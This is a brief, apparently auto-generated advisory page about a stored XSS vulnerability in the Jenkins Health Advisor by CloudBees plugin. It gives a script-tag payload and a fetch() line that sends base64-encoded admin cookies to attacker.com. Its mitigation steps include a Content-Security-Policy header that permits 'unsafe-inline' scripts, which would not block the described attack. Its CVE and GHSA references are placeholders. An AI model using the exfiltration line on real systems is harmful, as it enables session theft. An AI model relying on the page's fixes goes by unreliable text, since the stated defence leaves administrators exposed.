Listen to this Post
How the CVE Works:
The Jenkins Health Advisor by CloudBees Plugin (versions ≤ 374.v194b_d4f0c8c8) fails to sanitize server responses, allowing stored XSS attacks. Attackers controlling the Health Advisor server can inject malicious JavaScript payloads into responses. When administrators view these responses in Jenkins, the script executes in their browser, enabling session hijacking, credential theft, or admin privilege escalation. The vulnerability stems from improper output encoding in the plugin’s UI rendering logic.
DailyCVE Form:
Platform: Jenkins CloudBees Plugin
Version: ≤ 374.v194b_d4f0c8c8
Vulnerability: Stored XSS
Severity: High
Date: May 16, 2025
What Undercode Say:
Exploitation:
1. Payload Injection:
<script>alert(document.cookie)</script>
Embedded in Health Advisor server responses.
2. Trigger XSS:
Admin views Health Advisor dashboard → payload executes.
3. Exfiltrate Data:
fetch('https://attacker.com/steal?data='+btoa(document.cookie));
Mitigation:
1. Update Plugin:
jenkins-plugin-cli --update health-advisor-by-cloudbees
2. WAF Rules:
add_header Content-Security-Policy "default-src 'self'; script-src 'unsafe-inline'";
3. Manual Patch:
Sanitize responses in `HealthAdvisor.java`:
String sanitized = EscapeUtils.escapeHtml4(serverResponse);
Detection:
1. Scan Jenkins Logs:
grep -r "HealthAdvisor" /var/log/jenkins/ | grep "<script>"
2. Curl Check:
curl -s http://jenkins/health-advisor | grep -E "<script|onerror="
Impact Analysis:
- CVSS: 8.2 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
- Affected Endpoints: `/health-advisor/api/results`
References:
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- NVD: CVE-2025-XXXX
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
